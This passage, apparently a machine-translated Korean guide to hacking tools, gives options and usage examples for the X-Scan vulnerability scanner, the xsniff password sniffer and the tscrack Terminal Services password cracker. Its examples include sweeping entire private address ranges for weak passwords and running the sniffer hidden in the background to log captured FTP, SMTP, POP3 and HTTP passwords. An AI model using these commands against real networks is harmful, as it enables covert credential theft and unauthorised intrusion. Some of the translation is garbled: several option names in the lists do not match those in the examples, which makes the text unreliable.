-cgi는 CGI 취약성을 감지합니다.
- nasl Nessus 공격 스크립트 로드
-all 위 항목 모두 감지
기타 옵션
-i 어댑터 번호 네트워크 어댑터 설정, <어댑터 번호> "- l"매개변수 획득
-l 모든 네트워크 어댑터 표시
-v 자세한 검사 진행 상황 표시
-p 응답하지 않는 호스트 건너뛰기
-o 열린 포트가 감지되지 않은 호스트 건너뛰기
-t 동시 스레드 수, 동시 호스트 수는 최대 동시 스레드 수와 동시 호스트 수, 기본 수를 지정합니다. 100,10입니다.
-log 파일 이름은 스캔 보고서 파일 이름을 지정합니다(접미사: TXT 또는 HTML 형식 파일)
사용 예
xscan -host 192.168 .1.1-192.168.255.255 -all -active -p는 192.168.1.1-192.168.255.255 네트워크 세그먼트에 있는 호스트의 모든 취약점을 감지하고 응답하지 않는 호스트를 건너뜁니다.
xscan -host 192.168.1.1-192.168.255.255 - port -smb -t 150 -o 192.168.1.1-192.168.255.255 네트워크 세그먼트에서 호스트의 표준 포트 상태를 감지합니다. NT 취약한 비밀번호 사용자의 경우 최대 동시 스레드 수는 150이며, 열린 포트가 감지되지 않은 호스트는 건너뜁니다. /p>
xscan -file hostlist.txt -port -cgi -t 200,5 -v -o "hostlist.txt" 파일에 나열된 모든 호스트의 표준 포트 상태 및 CGI 취약점을 탐지합니다. 동시 스레드는 200개이며 동시에 최대 5개의 시스템을 감지할 수 있습니다. 호스트, 자세한 감지 진행 상황 표시, 열린 포트가 감지되지 않은 호스트 건너뛰기
3. 명령줄 스니퍼: xsniff.exe
FTP/SMTP/POP3/HTTP 프로토콜 비밀번호를 캡처할 수 있습니다.
매개변수 설명
-tcp 출력 TCP 데이터그램
-udp 출력 UDP 데이터그램
-icmp 출력 ICMP 데이터그램
-필터 비밀번호 정보 전달
-백그라운드 작업 숨기기
-host 호스트 이름 확인
-addr IP 주소 필터링 IP 주소
-port 포트 필터링 포트
-로그 파일 이름
출력을 파일로 저장합니다.
-asc ASCII 형식의 출력
-hex 16진수 형식의 출력
사용 예
xsniff. exe -pass -hide -log pass.log는 백그라운드에서 실행되어 비밀번호를 스니핑하고 pass.log 파일에 비밀번호 정보를 저장합니다.
xsniff.exe -tcp -udp -asc -addr 192.168.1.1 sniff 192.168 .1.1 그리고 tcp 및 udp 정보를 필터링하여 ASCII 형식으로 출력합니다.
4. 터미널 서비스 비밀번호 크래킹: tscrack.exe
매개변수 설명
-h 표시 사용법 도움말
-v 버전 정보 표시
-s 화면에 암호 해독 기능 인쇄
-b 비밀번호가 올바르지 않을 때 소리
-t 같음